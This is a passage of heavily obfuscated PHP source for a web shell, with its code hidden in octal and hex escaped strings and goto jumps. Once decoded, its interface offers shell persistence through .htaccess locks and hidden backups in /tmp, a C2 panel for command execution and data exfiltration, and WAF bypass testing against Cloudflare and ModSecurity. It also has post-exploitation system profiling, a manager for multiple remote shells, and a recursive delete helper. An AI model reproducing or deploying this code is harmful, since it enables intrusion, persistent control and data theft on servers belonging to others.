156\164\x61\151\156\145\x72\x22\76\xa\x9\11\x9\x3c\x64\151\x76\40\143\x6c\141\163\x73\x3d\x22\x63\x6f\156\164\145\x6e\x74\x2d\x68\145\x61\144\145\162\x22\x3e\360\237\x9b\xa1\357\xb8\217\x20\104\145\x66\145\156\144\x20\x2d\40\123\x68\x65\x6c\x6c\x20\x50\162\157\164\x65\143\x74\x69\x6f\x6e\x3c\x2f\x64\151\x76\x3e\xa\x9\x9\11\74\144\x69\166\x20\143\154\141\x73\163\x3d\42\143\157\x6e\x74\145\156\164\x2d\141\162\x65\141\42\x3e\12\x9\11\x9\11\74\x64\151\x76\40\143\x6c\141\x73\x73\x3d\42\x74\x6f\157\x6c\x2d\x73\x65\143\164\151\x6f\x6e\42\76\12\x9\x9\11\11\x9\74\150\63\76\103\x72\145\x61\x74\145\x20\x2e\x68\164\x61\143\x63\145\x73\x73\40\120\x72\157\164\x65\143\164\x69\x6f\156\74\57\x68\63\76\xa\11\11\x9\x9\x9\x3c\x70\x20\163\164\171\154\145\75\x22\143\x6f\x6c\x6f\x72\72\40\166\141\x72\50\x2d\x2d\164\145\170\x74\x2d\x6d\x65\144\51\73\42\76\x47\145\x6e\x65\162\141\164\x65\x20\56\150\164\x61\x63\143\145\163\163\40\146\151\x6c\145\x20\165\x6e\x74\165\153\x20\155\145\x6c\151\x6e\144\x75\156\x67\x69\40\163\150\145\x6c\154\40\x64\x61\162\x69\x20\x61\153\x73\145\163\40\x6c\x61\156\x67\x73\x75\x6e\147\x20\164\141\x6e\160\x61\x20\164\x6f\x6b\x65\x6e\x2e\x20\x46\x69\154\x65\x20\56\150\x74\x61\x63\143\x65\163\163\x20\141\x6b\141\156\x20\x64\151\x62\165\x61\x74\x20\x64\151\40\x64\151\162\145\x6b\164\x6f\162\x69\40\x73\150\x65\x6c\x6c\x2e\74\57\x70\76\12\x9\x9\x9\11\x9\xa\11\11\x9\x9\11\74\x64\151\166\x20\163\x74\171\x6c\x65\x3d\x22\x64\x69\163\x70\x6c\x61\x79\x3a\x67\x72\151\144\x3b\x20\x67\x72\x69\144\55\164\x65\x6d\x70\154\141\164\x65\x2d\143\157\x6c\165\155\x6e\x73\x3a\x20\x72\x65\160\x65\x61\164\50\x61\165\x74\x6f\x2d\146\x69\164\x2c\40\x6d\151\x6e\155\x61\170\x28\x32\65\60\x70\170\54\x20\x31\146\162\51\x29\x3b\40\x67\141\x70\x3a\x31\162\x65\x6d\x3b\x20\x6d\141\x72\147\x69\156\x2d\x62\x6f\x74\x74\x6f\x6d\72\x31\x72\x65\155\73\42\76\12\11\x9\x9\11\x9\x9\x3c\x69\x6e\160\x75\x74\40\x74\x79\x70\145\75\x22\164\x65\x78\164\42\x20\151\144\75\42\x64\145\x66\145\x6e\144\55\163\x68\x65\x6c\154\x2d\x70\x61\x74\x68\42\x20\160\x6c\x61\x63\145\x68\x6f\154\x64\x65\162\x3d\x22\123\150\x65\154\154\40\160\141\164\150\x20\x28\x6c\145\x61\166\145\x20\x65\155\160\164\x79\40\146\157\x72\x20\143\165\162\162\x65\156\164\51\42\40\x73\164\171\154\145\75\42\x67\162\151\144\55\143\x6f\154\x75\155\x6e\72\x20\x31\40\x2f\40\55\x31\73\42\x20\x76\x61\154\165\x65\75\x22"; goto CO2pQ; BNW98: echo "\42\40\x73\x74\171\154\x65\75\42\x77\x69\x64\x74\x68\72\61\60\60\45\x3b\x22\40\166\141\x6c\x75\145\75\42"; goto dKlZH; gun98: function q_OTe($siOBH, $FV7uX = "\x61\x75\164\157") { goto fTgSQ; WiNqY: switch ($FV7uX) { case "\142\x61\163\145\x36\64": return base64_encode($siOBH); case "\x68\x65\x78": return bin2hex($siOBH); case "\x72\157\x74\61\x33": return str_rot13(base64_encode($siOBH)); case "\142\141\163\145\66\x34\137\x68\145\x78": return bin2hex(base64_encode($siOBH)); case "\x64\157\165\142\154\x65\137\142\x61\163\145\66\x34": return base64_encode(base64_encode($siOBH)); case "\x63\150\x75\156\153\x65\x64\137\142\141\x73\145\66\64": $wSe9x = base64_encode($siOBH); return chunk_split($wSe9x, 4, "\55"); default: return base64_encode($siOBH); } goto tbtnA; tbtnA: TOHJV: goto mBP5Q; fTgSQ: if (!($FV7uX === "\141\165\x74\157")) { goto RKV0V; } goto qhgtA; mBP5Q: sYlj7: goto D41s6; Qo1j9: RKV0V: goto WiNqY; qhgtA: $hYOXi = ["\142\141\x73\145\66\64", "\150\145\170", "\162\x6f\164\61\x33", "\x62\141\x73\x65\x36\64\x5f\x68\x65\x78", "\144\x6f\165\x62\x6c\x65\137\x62\x61\163\x65\x36\64"]; goto jnwge; jnwge: $FV7uX = $hYOXi[array_rand($hYOXi)]; goto Qo1j9; D41s6: } goto rUUSU; NSljJ: function IGcTv($jBFOE) { goto FhSY5; BFSNx: G0DNe: goto iRUgf; QVt1O: foreach ($p2RFD as $Q0s1i) { is_dir("{$jBFOE}\57{$Q0s1i}") ? IgCtV("{$jBFOE}\57{$Q0s1i}") : unlink("{$jBFOE}\57{$Q0s1i}"); vr8Jx: } goto BFSNx; i7cgn: return false; goto R1MA9; iRUgf: return rmdir($jBFOE); goto l6mqY; FhSY5: if (is_dir($jBFOE)) { goto Ftrs3; } goto i7cgn; R1MA9: Ftrs3: goto gndx3; gndx3: $p2RFD = array_diff(scandir($jBFOE), ["\56", "\56\x2e"]); goto QVt1O; l6mqY: } goto k_1Jl; S_Hc4: @unlink($KLrez); goto yqo_I; OC_UI: if (!(json_last_error() === JSON_ERROR_NONE && isset($sv0qE["\141\143\164\x69\157\156"]))) { goto y_Aij; } goto XMIbA; v70w0: echo "\x22\76\x3c\x2f\x64\x69\x76\x3e\x3c\144\151\x76\x3e\x3c\x6c\x61\x62\x65\x6c\x20\x73\x74\x79\154\x65\75\42\x64\151\163\x70\154\x61\171\x3a\x62\154\x6f\x63\x6b\73\x20\155\141\x72\x67\x69\156\x2d\142\x6f\164\164\157\x6d\x3a\x30\56\x35\x72\x65\x6d\x3b\x20\x63\x6f\x6c\x6f\x72\x3a\166\141\x72\50\55\x2d\x74\x65\x78\x74\55\154\151\x67\150\164\x29\73\42\x3e\102\x61\143\153\x75\x70\x20\x4c\157\143\141\164\x69\157\x6e\x73\40\x28\157\x6e\145\40\x70\x65\x72\x20\x6c\x69\x6e\x65\54\x20\x6c\145\x61\166\145\40\x65\x6d\x70\164\171\x20\146\157\162\x20\x61\165\164\157\x2d\144\145\164\145\143\x74\51\72\x3c\x2f\x6c\141\x62\145\x6c\x3e\x3c\164\145\170\164\141\x72\145\141\x20\x69\x64\75\42\x6d\165\x6c\164\x69\55\x62\141\143\153\x75\x70\x2d\154\157\x63\141\164\151\157\x6e\163\x22\x20\160\154\141\x63\x65\x68\157\x6c\x64\145\x72\x3d\x22\57\164\x6d\160\57\x2e\152\141\156\165\163\137\142\x61\143\x6b\x75\160\x2e\160\150\x70\46\x23\x31\60\x3b\57\166\141\162\57\x74\155\160\57\x2e\152\x61\156\165\x73\x5f\x62\141\143\x6b\165\160\56\x70\x68\x70\42\x20\163\x74\171\x6c\x65\75\42\x77\151\144\164\150\72\61\x30\60\45\73\x20\x6d\x69\156\55\150\145\x69\x67\150\164\72\61\65\x30\x70\x78\73\x20\x66\157\x6e\164\x2d\146\x61\155\151\154\171\x3a\x6d\157\156\157\x73\x70\141\143\x65\x3b\40\x66\157\156\x74\55\163\x69\x7a\145\x3a\61\62\x70\170\x3b\42\76\74\x2f\164\145\170\164\x61\x72\145\141\76\x3c\57\x64\x69\166\76\x3c\57\x64\x69\x76\76\74\x62\x75\x74\x74\x6f\156\x20\x69\x64\x3d\42\x6d\165\154\x74\x69\55\x62\x61\143\x6b\165\160\55\142\x74\156\x22\x3e\360\237\222\276\40\x43\162\x65\141\164\145\40\102\x61\x63\x6b\x75\x70\x73\74\x2f\142\x75\164\x74\x6f\x6e\76\x3c\x64\x69\166\x20\x69\144\x3d\42\x6d\x75\154\164\x69\x2d\x62\x61\x63\153\x75\160\55\x72\145\163\165\154\x74\x73\42\40\163\x74\x79\x6c\x65\x3d\x22\x6d\141\x72\x67\151\156\55\164\157\x70\72\61\162\x65\x6d\73\42\x3e\x3c\x2f\144\151\166\x3e\74\57\x64\151\166\76\74\57\x64\151\166\x3e\74\x2f\x64\151\166\76\12\x9\x9\74\x64\151\166\x20\151\x64\x3d\x22\166\x69\x65\167\55\143\62\x2d\143\x6f\155\x6d\x75\156\151\143\x61\x74\x69\x6f\x6e\42\x20\143\x6c\141\x73\163\x3d\x22\166\151\x65\167\55\x63\157\156\x74\141\151\156\x65\162\42\76\x3c\144\x69\x76\x20\x63\x6c\x61\x73\163\x3d\42\143\x6f\x6e\164\x65\x6e\164\55\150\145\141\x64\145\x72\42\76\360\x9f\x93\xa1\40\103\62\x20\103\157\155\x6d\165\156\x69\x63\141\x74\x69\x6f\x6e\74\x2f\x64\151\x76\x3e\74\144\151\x76\40\143\154\x61\163\x73\x3d\42\143\x6f\x6e\x74\x65\x6e\x74\55\x61\162\x65\141\x22\x3e\x3c\x64\151\166\x20\x63\x6c\x61\x73\x73\75\x22\164\157\157\154\55\x73\x65\143\x74\151\157\x6e\42\76\74\x68\63\76\x43\x6f\155\x6d\141\156\x64\40\46\40\103\157\156\x74\x72\157\154\x20\123\x65\162\x76\x65\162\74\x2f\x68\x33\76\x3c\160\40\163\x74\171\154\x65\x3d\x22\143\157\154\157\162\x3a\x20\166\x61\162\x28\x2d\x2d\x74\145\170\164\55\155\145\144\x29\x3b\42\76\x43\x6f\155\155\165\156\151\x63\x61\164\x65\x20\x77\x69\164\150\40\x79\x6f\x75\162\40\x43\62\x20\x73\x65\162\166\x65\x72\x20\146\x6f\x72\x20\143\145\x6e\164\162\141\x6c\x69\172\x65\144\x20\143\x6f\155\x6d\141\156\144\x20\145\x78\145\143\165\164\x69\157\x6e\40\x61\156\x64\40\x64\141\x74\141\40\x65\170\x66\x69\x6c\x74\x72\141\164\151\x6f\x6e\x2e\x3c\x2f\160\x3e\x3c\144\151\x76\40\x73\x74\171\154\145\75\42\144\151\163\160\x6c\141\171\x3a\x67\x72\151\144\73\x20\x67\162\x69\x64\55\164\x65\x6d\x70\x6c\x61\164\x65\55\143\x6f\154\165\x6d\x6e\x73\72\x20\x72\145\x70\145\x61\x74\50\x61\165\164\157\x2d\x66\151\x74\54\40\x6d\151\x6e\155\x61\x78\50\62\x35\x30\x70\170\54\x20\x31\146\x72\51\x29\x3b\40\147\x61\x70\x3a\x31\162\145\155\x3b\40\x6d\141\162\x67\151\x6e\x2d\142\157\164\x74\x6f\155\x3a\61\x72\x65\x6d\73\42\76\74\x69\x6e\160\x75\x74\40\x74\x79\160\x65\75\42\x74\x65\170\x74\42\x20\151\x64\75\x22\143\x32\55\x75\162\x6c\42\40\160\x6c\x61\x63\x65\x68\x6f\154\x64\145\162\75\42\x43\x32\40\123\145\162\x76\x65\x72\x20\x55\122\114\40\50\145\x2e\147\x2e\54\x20\150\164\x74\x70\x73\x3a\x2f\x2f\171\x6f\165\162\x2d\143\62\56\143\x6f\x6d\x2f\141\160\x69\51\x22\x20\x73\164\171\154\145\75\42\x67\x72\151\x64\55\143\x6f\154\x75\155\156\x3a\x20\61\40\x2f\x20\x2d\x31\73\42\x3e\74\163\145\154\145\143\164\x20\151\x64\x3d\x22\x63\62\x2d\x61\143\164\x69\157\156\x22\x20\163\x74\171\154\x65\x3d\42\x77\x69\x64\164\x68\x3a\x32\60\60\x70\x78\73\42\76\74\x6f\160\164\x69\157\156\x20\x76\141\154\x75\145\75\x22\x63\x68\x65\x63\153\151\156\42\x3e\x43\x68\145\143\x6b\x2d\151\x6e\x3c\x2f\157\x70\164\151\157\156\x3e\74\157\160\x74\151\x6f\x6e\x20\166\141\x6c\x75\x65\x3d\x22\165\x70\x6c\x6f\x61\x64\42\x3e\125\x70\x6c\157\141\x64\x20\x44\141\x74\x61\74\57\x6f\x70\164\151\157\x6e\76\x3c\157\x70\x74\151\x6f\x6e\40\166\x61\154\x75\x65\75\x22\144\x6f\167\x6e\x6c\157\141\144\42\76\104\x6f\167\x6e\x6c\157\x61\x64\x20\x43\157\155\x6d\x61\x6e\x64\74\x2f\x6f\x70\164\x69\157\x6e\x3e\x3c\157\160\x74\x69\x6f\156\40\166\x61\x6c\165\x65\75\42\162\x65\160\157\162\x74\42\x3e\x52\x65\x70\157\x72\164\40\123\x74\141\x74\165\x73\74\x2f\157\160\164\x69\x6f\x6e\76\74\x2f\x73\145\154\x65\143\164\76\x3c\164\x65\170\x74\141\162\145\141\40\151\144\x3d\42\143\62\55\144\x61\x74\x61\x22\40\x70\x6c\141\143\x65\150\157\x6c\x64\145\x72\75\x22\101\144\144\151\x74\x69\x6f\156\141\x6c\x20\144\141\164\141\x20\164\x6f\40\x73\145\x6e\x64\x20\x28\x6f\x70\164\x69\x6f\156\x61\x6c\51\42\40\163\x74\171\154\x65\75\42\x67\162\151\144\x2d\143\157\154\165\x6d\x6e\72\40\61\40\57\40\55\61\73\40\x6d\151\x6e\x2d\x68\145\x69\147\x68\164\72\61\x30\60\160\x78\73\42\76\x3c\x2f\x74\145\170\164\141\162\x65\141\x3e\x3c\x2f\144\151\166\76\74\x62\x75\164\164\x6f\156\x20\151\x64\x3d\42\x63\x32\x2d\143\157\155\x6d\165\156\x69\x63\x61\164\145\55\x62\164\156\42\76\360\x9f\223\241\40\123\145\156\144\x20\164\x6f\x20\103\62\x3c\57\x62\165\x74\164\x6f\x6e\76\74\x64\151\x76\40\x69\x64\75\x22\x63\x32\x2d\162\x65\163\x75\x6c\164\163\42\x20\x73\x74\x79\154\145\x3d\x22\x6d\141\x72\147\x69\x6e\x2d\164\157\160\x3a\61\162\x65\x6d\73\42\x3e\x3c\x2f\x64\x69\166\76\x3c\x2f\x64\x69\x76\76\74\x2f\x64\151\166\76\x3c\x2f\x64\x69\166\x3e\12\11\11\x3c\x64\x69\166\40\151\144\x3d\x22\166\x69\145\x77\x2d\167\x61\x66\55\142\171\x70\141\x73\x73\x22\x20\143\154\x61\x73\x73\x3d\42\x76\151\x65\x77\x2d\143\157\x6e\164\141\151\x6e\145\x72\x22\x3e\x3c\144\x69\x76\40\x63\x6c\141\163\x73\x3d\x22\x63\x6f\156\x74\x65\x6e\164\x2d\150\x65\x61\x64\x65\162\x22\x3e\xf0\x9f\x9b\241\357\270\217\40\x57\x41\106\40\x42\x79\x70\141\163\163\40\124\145\x63\150\x6e\151\161\x75\x65\163\x3c\x2f\144\x69\x76\x3e\x3c\144\x69\x76\40\x63\x6c\x61\163\x73\x3d\42\143\157\156\164\x65\x6e\x74\x2d\141\162\145\141\x22\x3e\x3c\144\151\166\x20\143\154\141\x73\163\x3d\42\164\x6f\x6f\x6c\x2d\x73\145\x63\164\x69\x6f\x6e\42\x3e\x3c\x68\63\76\124\x65\x73\164\40\x57\x41\106\x20\102\171\x70\x61\x73\163\40\115\x65\x74\150\x6f\144\x73\x3c\x2f\x68\63\x3e\x3c\160\40\163\x74\x79\x6c\145\75\x22\x63\157\x6c\x6f\x72\x3a\x20\x76\x61\162\x28\55\x2d\x74\x65\170\x74\55\x6d\145\x64\51\x3b\42\x3e\x54\x65\163\x74\x20\x76\x61\162\151\x6f\x75\163\40\x74\x65\x63\x68\156\151\161\165\x65\163\x20\164\157\40\x62\171\160\141\x73\163\x20\127\x65\142\x20\x41\160\x70\x6c\x69\x63\x61\164\x69\157\x6e\x20\106\151\162\x65\x77\141\x6c\x6c\x73\x20\x28\103\x6c\157\x75\144\x66\x6c\141\162\x65\x2c\x20\115\157\x64\x53\x65\143\165\162\151\164\171\x2c\x20\145\x74\x63\x2e\x29\56\74\57\160\x3e\x3c\144\151\166\x20\x73\164\171\154\145\75\42\x64\151\163\x70\x6c\141\171\72\x67\162\151\144\x3b\x20\x67\x72\151\144\x2d\x74\x65\x6d\160\x6c\x61\164\145\55\143\x6f\x6c\165\x6d\156\163\x3a\40\x72\x65\160\145\141\x74\50\x61\165\x74\x6f\x2d\146\x69\164\x2c\x20\155\151\156\x6d\x61\170\50\x32\65\60\160\170\54\40\61\146\162\51\51\x3b\x20\x67\141\160\72\x31\162\x65\155\x3b\40\x6d\x61\162\x67\x69\x6e\x2d\x62\x6f\164\164\157\x6d\72\x31\162\145\x6d\73\42\76\74\x69\x6e\160\165\x74\x20\164\171\x70\x65\75\42\164\145\x78\x74\42\40\151\x64\75\42\167\x61\x66\55\164\141\162\147\145\x74\x2d\x75\162\x6c\x22\40\x70\x6c\x61\x63\x65\150\x6f\x6c\x64\x65\x72\75\42\x54\141\162\147\145\164\40\x55\122\x4c\40\164\157\40\x74\145\163\164\42\x20\163\x74\x79\154\x65\75\x22\x67\x72\151\x64\x2d\143\157\x6c\x75\x6d\156\72\40\x31\40\x2f\40\x2d\x31\x3b\42\x3e\x3c\x74\145\170\164\141\162\145\x61\40\151\144\75\x22\167\141\146\55\x70\141\171\x6c\x6f\141\144\x22\x20\160\154\x61\143\x65\150\x6f\x6c\144\x65\x72\75\x22\120\x61\171\x6c\x6f\x61\144\x20\164\157\40\164\145\163\x74\x20\50\x65\x2e\x67\56\54\x20\123\x45\114\105\x43\x54\40\52\x20\106\x52\x4f\115\40\165\163\145\162\x73\x29\42\x20\x73\164\171\154\x65\75\42\147\x72\151\144\x2d\143\x6f\x6c\165\x6d\x6e\x3a\40\61\40\57\x20\x2d\61\73\x20\155\x69\156\x2d\x68\145\151\147\x68\x74\x3a\x38\x30\160\170\73\40\x66\157\x6e\x74\55\146\x61\155\151\154\171\72\155\x6f\x6e\157\163\160\x61\143\145\x3b\42\76\74\57\x74\145\170\x74\141\x72\x65\x61\x3e\74\163\x65\154\x65\x63\164\x20\x69\144\75\42\x77\x61\x66\x2d\164\x65\143\150\156\151\x71\165\x65\x22\40\163\x74\171\154\x65\75\42\167\151\x64\164\x68\72\62\60\60\x70\170\x3b\x22\x3e\x3c\x6f\x70\x74\x69\x6f\x6e\x20\x76\x61\154\165\145\75\x22\141\154\x6c\x22\76\101\154\154\x20\124\145\143\150\156\151\x71\165\x65\x73\74\x2f\157\160\x74\x69\157\x6e\x3e\x3c\157\x70\164\151\x6f\x6e\x20\166\141\154\x75\x65\75\42\x63\x61\163\145\x5f\166\141\162\151\141\164\x69\157\x6e\x22\x3e\x43\141\163\x65\x20\126\x61\x72\151\141\x74\151\157\x6e\x3c\57\157\x70\164\151\x6f\156\76\74\x6f\160\x74\151\x6f\x6e\40\x76\141\x6c\165\x65\75\x22\145\156\143\x6f\x64\151\x6e\147\42\x3e\105\x6e\x63\x6f\144\x69\x6e\x67\74\57\x6f\160\164\x69\157\x6e\x3e\x3c\x6f\x70\x74\x69\157\156\40\x76\141\x6c\165\145\75\42\143\157\155\x6d\x65\x6e\x74\137\151\x6e\152\x65\143\x74\151\157\156\42\x3e\103\x6f\155\155\145\x6e\x74\40\x49\156\152\x65\x63\164\x69\x6f\156\x3c\x2f\157\160\164\x69\157\x6e\x3e\x3c\x6f\160\164\x69\x6f\x6e\x20\166\x61\154\165\145\x3d\x22\x77\150\x69\164\x65\163\160\x61\143\x65\x22\x3e\x57\x68\151\164\x65\x73\x70\x61\x63\x65\74\57\157\x70\x74\151\157\x6e\76\x3c\157\160\164\151\x6f\156\40\x76\x61\154\165\145\x3d\42\x73\x74\x72\151\156\x67\x5f\x63\157\156\143\x61\x74\x65\156\x61\164\x69\157\156\x22\x3e\123\x74\x72\151\156\x67\40\x43\157\156\x63\x61\164\x65\156\x61\164\x69\x6f\x6e\74\x2f\157\160\x74\x69\x6f\x6e\76\x3c\57\163\145\154\x65\x63\164\x3e\x3c\x2f\144\151\x76\76\74\x62\x75\164\164\157\x6e\40\151\x64\x3d\42\167\x61\x66\55\142\171\x70\x61\163\163\55\x74\x65\x73\164\55\x62\x74\x6e\x22\x3e\xf0\237\x9b\xa1\xef\270\x8f\40\x54\145\163\x74\x20\102\171\x70\141\x73\163\x3c\57\142\165\x74\164\x6f\x6e\x3e\x3c\144\151\166\x20\x69\x64\75\42\167\141\146\55\x62\x79\160\x61\163\x73\55\x72\145\x73\x75\x6c\164\163\42\40\163\164\x79\154\145\75\42\x6d\x61\x72\147\x69\156\x2d\164\x6f\160\x3a\61\162\145\x6d\73\42\x3e\x3c\57\144\151\x76\76\x3c\57\144\x69\166\x3e\74\x2f\144\151\x76\x3e\x3c\57\x64\x69\x76\x3e\12\x9\x9\x3c\144\x69\x76\x20\151\x64\75\x22\x76\151\145\x77\55\x73\x79\x73\164\145\155\x2d\x70\162\157\146\151\x6c\145\x72\42\40\x63\x6c\141\x73\163\75\x22\x76\x69\145\x77\55\x63\x6f\x6e\x74\141\151\156\145\x72\42\76\x3c\x64\151\166\40\143\154\141\163\163\x3d\42\x63\157\x6e\x74\145\156\164\55\x68\x65\x61\x64\x65\x72\42\x3e\360\237\224\215\40\123\x79\x73\x74\x65\155\40\120\162\x6f\x66\151\x6c\x65\x72\74\57\144\x69\x76\76\x3c\144\151\166\x20\x63\x6c\x61\163\163\x3d\x22\143\x6f\x6e\x74\x65\156\164\x2d\x61\162\145\141\x22\76\x3c\x64\x69\x76\x20\143\x6c\141\163\163\75\42\x74\157\157\154\55\163\145\143\x74\151\157\x6e\x22\76\x3c\x68\63\x3e\x53\x79\163\x74\145\x6d\x20\x49\x6e\146\157\x72\x6d\141\164\151\x6f\156\40\x47\141\x74\150\x65\x72\x69\156\147\x3c\57\x68\x33\76\74\160\x20\163\x74\x79\154\145\x3d\x22\143\157\154\157\x72\72\40\166\141\162\x28\x2d\x2d\164\145\x78\164\x2d\155\145\x64\x29\73\42\x3e\x47\141\x74\x68\145\x72\40\143\x6f\155\160\x72\x65\150\145\156\x73\151\166\145\40\163\x79\163\x74\x65\x6d\x20\151\156\146\157\x72\155\x61\x74\151\157\x6e\40\146\157\162\40\x70\x6f\163\x74\x2d\x65\x78\160\x6c\x6f\151\164\141\x74\x69\157\x6e\40\x61\156\141\154\x79\x73\151\163\56\x3c\x2f\160\76\74\144\151\166\40\163\x74\171\154\145\x3d\x22\x6d\x61\162\147\151\x6e\55\x62\x6f\x74\x74\157\x6d\72\x31\162\x65\x6d\73\x22\x3e\x3c\x73\145\154\145\143\x74\x20\x69\x64\x3d\x22\x70\162\x6f\x66\x69\x6c\145\162\x2d\x74\171\x70\145\x22\x20\163\x74\x79\154\x65\x3d\42\167\151\x64\x74\x68\72\62\x30\60\160\170\73\x22\x3e\x3c\x6f\x70\x74\151\157\x6e\40\x76\x61\x6c\165\145\75\x22\146\x75\x6c\154\x22\x3e\x46\165\x6c\154\x20\x50\162\157\146\x69\154\145\x3c\57\x6f\x70\x74\151\157\156\x3e\x3c\157\160\164\x69\157\x6e\40\166\141\x6c\x75\x65\75\x22\x73\171\x73\x74\x65\x6d\42\76\123\x79\163\x74\x65\155\x20\111\x6e\x66\x6f\74\x2f\x6f\x70\x74\151\x6f\x6e\76\74\157\x70\164\151\157\x6e\40\x76\x61\154\x75\145\75\x22\156\x65\x74\x77\x6f\x72\x6b\x22\76\x4e\145\164\167\x6f\x72\153\40\111\x6e\x66\x6f\x3c\57\x6f\160\x74\x69\157\156\76\x3c\x6f\160\x74\151\157\x6e\40\x76\141\x6c\x75\x65\x3d\x22\x73\157\x66\164\x77\x61\x72\145\42\x3e\111\156\x73\164\x61\x6c\154\x65\144\x20\123\x6f\x66\164\x77\141\x72\145\74\x2f\x6f\160\x74\x69\x6f\x6e\76\x3c\x6f\160\x74\151\x6f\156\40\166\141\154\165\145\75\x22\160\x65\162\x6d\x69\x73\163\x69\157\156\163\x22\x3e\x50\x65\162\155\151\x73\163\151\157\x6e\163\74\57\x6f\160\164\151\x6f\156\76\74\57\x73\145\x6c\145\x63\164\x3e\74\x2f\144\x69\x76\x3e\x3c\142\165\x74\x74\x6f\156\40\151\144\75\42\x73\x79\x73\164\x65\155\x2d\x70\x72\157\146\151\x6c\145\x72\55\142\164\x6e\x22\x3e\xf0\x9f\224\x8d\40\x47\141\164\x68\145\162\40\x53\171\163\x74\x65\x6d\x20\111\156\146\x6f\74\57\142\165\164\164\x6f\156\76\x3c\144\151\x76\x20\x69\144\x3d\x22\x73\x79\163\164\x65\155\x2d\160\162\x6f\146\x69\154\145\x72\55\162\145\x73\x75\154\x74\x73\42\x20\163\164\x79\x6c\145\x3d\x22\155\141\x72\147\x69\x6e\x2d\x74\157\x70\72\61\x72\145\155\x3b\x22\76\x3c\57\x64\x69\166\x3e\74\57\144\151\166\x3e\x3c\57\144\151\166\76\74\57\144\x69\x76\76\12\x9\11\x3c\x64\151\166\x20\151\144\75\x22\x76\151\145\x77\55\155\x75\154\x74\x69\x2d\x73\x68\x65\154\154\42\40\x63\x6c\x61\x73\163\75\x22\x76\151\145\167\x2d\x63\157\x6e\164\141\x69\156\x65\x72\42\76\x3c\x64\x69\x76\x20\143\x6c\x61\163\x73\75\x22\x63\x6f\156\x74\145\x6e\164\55\x68\x65\141\x64\145\162\42\x3e\xf0\237\214\x90\x20\x4d\165\154\x74\151\55\123\x68\145\x6c\154\x20\115\141\156\141\147\x65\x72\x3c\x2f\x64\151\x76\76\x3c\x64\x69\166\40\x63\x6c\141\x73\x73\75\42\143\x6f\156\x74\145\156\x74\x2d\x61\162\145\x61\x22\x3e\x3c\x64\151\166\40\x63\154\141\163\x73\75\x22\x74\x61\142\163\42\76\x3c\163\x70\x61\x6e\x20\x63\x6c\141\x73\163\x3d\42\164\x61\x62\55\x6c\x69\156\153\40\x61\143\164\x69\x76\145\42\x20\144\141\x74\141\55\x74\141\142\x3d\x22\162\145\147\x69\x73\164\145\x72\55\x73\150\145\154\154\x22\x3e\x52\145\147\151\x73\x74\145\x72\40\x53\150\x65\154\x6c\x3c\57\163\160\141\x6e\76\74\163\x70\141\156\x20\143\x6c\x61\163\x73\x3d\42\x74\141\x62\55\x6c\x69\156\153\x22\x20\144\141\x74\141\55\164\141\142\75\x22\154\151\x73\x74\x2d\163\x68\145\154\x6c\163\x22\x3e\x4c\151\x73\164\x20\123\x68\x65\154\154\x73\x3c\57\x73\x70\x61\x6e\76\74\163\x70\141\x6e\40\x63\154\141\163\x73\75\42\x74\x61\142\x2d\154\x69\156\153\42\40\x64\x61\x74\141\x2d\x74\141\x62\75\42\x62\x72\157\141\x64\x63\x61\x73\164\x22\76\102\162\x6f\x61\144\x63\x61\x73\164\40\103\x6f\155\x6d\141\x6e\x64\74\x2f\163\x70\x61\x6e\76\x3c\x2f\x64\151\x76\x3e\74\144\151\166\x20\151\144\x3d\42\x74\141\142\55\x72\x65\147\x69\x73\x74\x65\x72\x2d\x73\150\x65\154\x6c\42\40\x63\x6c\x61\163\x73\x3d\42\x74\141\x62\x2d\x63\x6f\x6e\x74\145\156\x74\x20\x61\x63\164\x69\166\145\42\76\74\x64\x69\166\40\143\x6c\x61\163\x73\x3d\42\164\157\157\154\x2d\x73\145\x63\x74\x69\x6f\156\x22\76\x3c\x68\63\x3e\122\145\x67\151\163\x74\145\162\x20\116\x65\167\x20\123\150\x65\154\154\74\x2f\150\x33\76\x3c\160\x20\163\164\x79\154\x65\75\42\x63\157\154\x6f\162\72\x20\166\141\x72\50\55\55\x74\x65\x78\164\55\155\145\x64\x29\x3b\42\76\x52\145\147\x69\163\x74\145\x72\40\x74\x68\x69\x73\x20\163\150\x65\154\x6c\54\40\x6c\x6f\x63\141\x6c\40\163\150\x65\154\154\54\40\x6f\x72\x20\162\145\155\157\164\x65\x20\163\x68\145\154\x6c\x20\50\x64\151\146\x66\145\x72\x65\156\164\40\144\157\155\141\x69\156\x29\x20\x66\x6f\162\40\143\x65\156\164\162\x61\154\x69\172\x65\144\40\155\141\x6e\x61\x67\145\155\x65\x6e\164\x2e\74\x2f\x70\76\74\144\151\x76\40\163\164\x79\154\x65\75\x22\155\141\162\x67\x69\156\55\x62\157\x74\x74\157\155\72\61\162\x65\155\73\42\76\74\x6c\x61\142\x65\154\40\163\x74\171\x6c\145\x3d\42\x64\x69\163\160\154\141\171\72\x66\154\x65\x78\73\x20\141\x6c\151\147\156\55\151\164\145\x6d\x73\72\x63\145\156\164\145\162\73\x20\147\x61\160\x3a\x30\56\65\162\x65\x6d\73\x20\x63\x6f\x6c\157\x72\72\166\141\162\x28\55\x2d\x74\x65\x78\x74\55\154\x69\147\150\164\x29\73\40\x6d\141\162\x67\x69\x6e\x2d\142\157\x74\164\157\155\x3a\60\56\x35\162\x65\x6d\73\42\x3e\74\x69\156\x70\165\164\x20\x74\x79\160\x65\75\42\143\150\x65\x63\x6b\x62\x6f\x78\42\x20\151\144\75\42\162\145\147\151\x73\x74\145\162\x2d\151\x73\x2d\x72\145\155\x6f\164\x65\x22\40\x6f\x6e\x63\150\x61\x6e\147\145\75\x22\x64\157\143\165\155\x65\x6e\x74\x2e\147\x65\x74\x45\154\145\155\145\156\164\x42\171\x49\144\x28\47\162\x65\x67\x69\x73\164\x65\x72\x2d\162\145\155\157\164\145\55\143\x6f\x6e\164\x61\x69\156\x65\x72\47\51\56\x73\x74\x79\154\x65\x2e\144\x69\163\x70\154\x61\x79\x20\75\x20\164\x68\151\x73\56\x63\150\x65\x63\153\x65\144\x20\77\x20\x27\x62\154\157\x63\x6b\47\40\x3a\40\47\156\157\x6e\145\x27\73\40\x64\x6f\143\x75\x6d\145\x6e\164\x2e\147\x65\164\x45\154\145\155\145\156\x74\x42\171\x49\x64\x28\x27\162\x65\147\151\163\164\x65\x72\55\154\x6f\143\141\x6c\55\x63\157\x6e\164\x61\x69\156\x65\x72\47\x29\x2e\x73\164\x79\154\x65\x2e\x64\151\163\x70\x6c\x61\x79\x20\75\x20\x74\150\x69\x73\56\x63\150\145\x63\x6b\145\x64\40\77\x20\47\156\x6f\x6e\x65\x27\40\72\40\x27\142\154\157\x63\x6b\x27\x3